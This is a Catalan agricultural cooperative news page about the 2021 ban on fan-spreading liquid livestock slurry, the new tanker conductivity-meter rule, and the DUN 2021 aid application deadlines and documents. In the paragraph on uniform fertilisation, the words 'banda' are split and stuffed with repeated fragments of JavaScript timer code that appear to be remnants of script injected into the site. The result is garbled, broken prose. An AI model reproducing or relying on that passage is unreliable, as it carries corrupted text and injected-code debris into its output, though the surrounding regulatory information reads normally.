L’aplicació de purins i altres dejeccions ramaderes líquides ja no es pot fer amb vano o ventall

A partir del 21 de febrer del 2021 caldrà utilitzar sistemes d’aplicació localitzada, com ara els tubs penjants o els injectors. Així mateix, totes les cisternes hauran de disposar d’un conductímetre, o altre mètode de precisió equivalent

Els purins i altres dejeccions ramaderes líquides, contenen una elevada proporció de nitrogen en forma amoniacal, cosa que fa que tinguin un elevat risc de perdre’s cap a l’atmosfera. De fet, segons l’inventari d’emissions nacionals, el sector agrari és responsable del 97% de les emissions d’amoníac (NH3), la majoria atribuïdes a la gestió de les dejeccions ramaderes. Gran part d’aquestes emissions es donen durant la seva aplicació al camp, quan les dejeccions s’apliquen amb l’objectiu de fertilitzar els cultius.

El Decret 153/2019, que va entrar en vigor el 25 de juliol de 2019, ja fixava l’eliminació progressiva d’aquests tipus de sistemes d’aplicació tradicionals. La prohibició definitiva del ventall o “vano” es farà efectiva a partir del proper 21 de febrer. D’aquesta manera, es dona pas a sistemes més innovadors d’aplicació localitzada, ja sigui en superfície (mànegues o tubs penjants) com en profunditat (injectors o enterradors). Podeu consultar les empreses que subministren aquest tipus d’equips en aquest enllaç.

Els sistemes d’aplicació localitzada també permeten fertilitzar de manera més uniforme. Per una bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda, poden reduir la sobrefertilització que en determinades zones de la parcel·la receptora, i on l’excés de nitrogen es podria rentar i perdre’s en profunditat. Per una altra bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda, asseguren que no hi hagi zones que rebin menys nitrogen de l’esperat i que podrien donar lloc a baixades de producció.

Aquests equips també es poden instal·lar en les cisternes ja existents i s’han d’inscriure al Registre Oficial de Maquinària Agrícola (ROMA), d’acord amb el que estableix el Reial Decret 1013/2009, de 19 de juny, sobre caracterització i registre de maquinària agrícola.

La utilització d’aquests sistemes alternatius busca incrementar l’eficiència i aconseguir el màxim aprofitament dels nutrients aportats. En general, els purins i la resta de fertilitzants seran més eficients com menys pèrdues tinguin. Reduir el rentat, la volatilització o qualsevol altre tipus de pèrdua farà que una major quantitat de nitrogen que s’aplica al sòl sigui aprofitable per al cultiu.

Cal destacar també que a partir de 21 de febrer, totes les cisternes hauran de disposar d’un conductímetre, o altre mètode de precisió equivalent, que permeti estimar la concentració de nutrients del purí. Haurà d’estar instal·lat de manera permanent a la cisterna. Com a alternativa, es permet instal·lar l’eina a la mateixa instal·lació d’emmagatzematge. Podeu consultar les empreses que subministren aquest tipus d’equips en aquest enllaç.

Font d’informació: Oficina de Fertilització i Tractament de dejeccions ramaderes

Obert el període de tramitació de la DUN 2021

L’1 de febrer s’inicia el període de tramitació de la DUN 2021 i el termini finalitzarà el proper 30 d’abril (pel que fa a la sol·licitud dels ajuts directes i de contracte global d’explotació ) 

Cal recordar, que durant aquest mateix període es pot demanar l’ajut per la Incorporació de Joves i els ajuts per a realitzar inversions a la explotació (Pla de Millora, Diversificació cap a activitats no agrícoles i altres ajuts per la Mitigació del canvi climàtic). Poseu-vos en contacte amb nosaltres i us assessorarem.

L’elaboració de la DUN té la seva complexitat, no és un simple tràmit, cal revisar-la i adequar bé a la realitat de la vostra explotació, d’aquesta manera s’assegura que l’accés als ajuts sigui un èxit i el risc de penalitzacions mínim.

A GAP Cooperativa, estem, com sempre, al servei de tots els nostres associats i associades i per ajudar-vos a gestionar d’una manera correcta la tramitació de la DUN

Qui està obligat a presentar la DUN?

 • Les persones titulars d’explotacions agrícoles que realitzin la seva activitat dins de l’àmbit de la producció primària agrícola excepte:
   • Persones titulars d’explotacions agrícoles que destinin íntegrament la producció al consum domèstic privat.
   • Persones titulars d’explotacions agrícoles que estiguin inscrits en el Registre Oficial d’Empreses Proveïdores de Material Vegetal, sempre que les produccions obtingudes no es destinin al consum humà o animal i que presentin la corresponent declaració anual de cultius.
 • Les entitats o agrupacions d’agricultors/esque no siguin titulars d’explotacions agràries i que vulguin realitzar algun dels tràmits o sol·licituds de l’annex 1 de l’Ordre que regula la DUN.
 • Altres (venda de proximitat)

Que ha d’incloure la DUN?

 • Dades generals de l’explotació i del declarant
 • Dades de la totalitat de la superfície, agrària, forestal i improductiva
 • Dades de ramaderia que formin part de l’explotació.

Una mateixa superfície no pot estar inclosa en diferents declaracions.

Per a informació més detallada, consultar l’annex 2 de l’Ordre que regula la DUN.

Quins efectes té la DUN

A la DUN es declaren totes les dades necessàries a efectes de la concessió dels ajuts i altres tràmits que es detallen a l’annex 1 de l’Ordre que regula la DUN.

Es poden trobar tots els efectes de la DUN a l’article 8 de la mateixa Ordre.

Documents a Presentar

A la DUN s’adjuntarà, si escau, la documentació que es relaciona a continuació. No obstant això, no caldrà presentar-la si ja s’ha presentat anteriorment al DARP i de la qual no n’hagin variat les dades i continuïn sent vigents:

 • Tota la documentació que es demani específicament per a cadascun dels ajuts sol·licitats i que s’especifiquin als annexos de l’ordre de la DUN i a les ordres de convocatòria dels ajuts corresponents.
 • Verificació de les dades d’identitat de la persona sol·licitant o de qui la representi corresponents al DNI/NIF/NIE o altre document que l’acrediti, si escau. En cas que la persona titular signi la DUN amb signatura electrònica, no cal aportar cap document acreditatiu d’identitat.
 • En cas de fer declaracions de parcel·les de Catalunya d’aprofitament farratger en comú, s’ha de disposar dels certificats d’adjudicació emesos per les entitats gestores per mitjà de l’aplicació Comunals que el DARP facilita a aquest efecte. El DARP podrà requerir en qualsevol moment els certificats esmentats.
 • Documentació d’autorització de signatura i/o de representació, si escau.
 • En cas de sol·licitar la qualificació d’explotació agrària prioritària, la documentació que consta a l’annex 5 de l’ordre de la DUN.
 • En cas de sol·licitar modificacions de SIGPAC o realitzar declaracions de conreu que afectin parcialment un recinte, serà requisit indispensable l’elaboració i la presentació d’un croquis mitjançant l’aplicació DUN.
 • En cas que una agrupació de productors faci una comunicació de venda de proximitat d’acord amb la norma reguladora si escau, cal adjuntar a la DUN la relació de tots els seus associats productors.
 • En el cas que es facin comunicacions de cessions de drets de pagament bàsic, s’ha d’adjuntar a la DUN la documentació requerida d’acord amb l’annex 6 de l’Ordre de la DUN.

Quan es pot presentar la DUN?

 • La DUN es pot presentar des de l’1 de febrer fins al 31 de desembre.
 • La sol·licitud dels ajuts directes i de contracte global d’explotació  s’ha de fer de l’1 de febrer fins al 30 d’abril. D’aquests es poden presentar modificacions fins al 31 de maig.
 • La sol·licitud de l’ajut a la reestructuració i reconversió de la vinya pel període 2019-2023 corresponent a l’any 2021 es presentarà entre l’1 de febrer i el 26 de març.
 • La sol·licitud de drets de la reserva de pagament bàsic, les cessions per l’assignació de drets de pagament bàsic, la renúncia al règim de petits agricultors i altres tràmits específics s’ha de fer de l’1 de febrer al 31 de maig.

La renúncia a un ajut després, del termini de presentació de sol·licituds d’aquest, s’ha de presentar a través de l’aplicació de la DUN.

 

Més informació DUN – Generalitat Catalunya